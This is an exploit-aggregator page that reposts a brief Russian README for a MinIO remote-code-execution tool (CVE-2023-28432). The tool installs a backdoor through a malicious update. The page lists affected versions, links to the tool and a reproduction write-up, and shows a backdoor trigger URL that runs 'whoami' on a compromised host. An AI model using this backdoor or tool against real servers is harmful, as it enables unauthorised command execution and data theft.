Sploitus

Exploit for CVE-2023-28432-minio_update_rce

kitploit · 2026-09-04

Exploit Code

MARKDOWN12 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-UNAM4-CVE-2023-28432-MINIO_UPDATE_RCE
# minio-CVE-2023-28432-rce

https://github.com/AbelChe/evil_minio/tree/main оригинальный адрес проекта Личный архив (сохранено для себя) Затрагиваемые версии: 2019-12-17T23-16-33Z – RELEASE.2023-03-20T20-16-18Z

Воспроизведение: https://www.yuque.com/jason-soozc/luhd40/pgabr9xvg0kgx85v?singleDoc# «minlo: от отсутствия авторизации до RCE в кластерном режиме»

Глобальный бэкдор: http://1.2.3.4/?alive=whoami и http://1.2.3.4/anything?alive=whoami

![image](https://assets.kitploit.com/production/public/readmes/33823/e5837c91b96d4b4188ce9c5153180be7bb6d00212f1a7a2c64122b43b77d7de0.png)

Отказ от ответственности: данный инструмент предназначен только для исследований в области безопасности. Не используйте его для незаконного тестирования. Любые прямые или косвенные последствия и убытки, возникшие в результате распространения или использования информации, предоставленной в этом документе, возлагаются на самого пользователя. Автор не несёт за это никакой ответственности.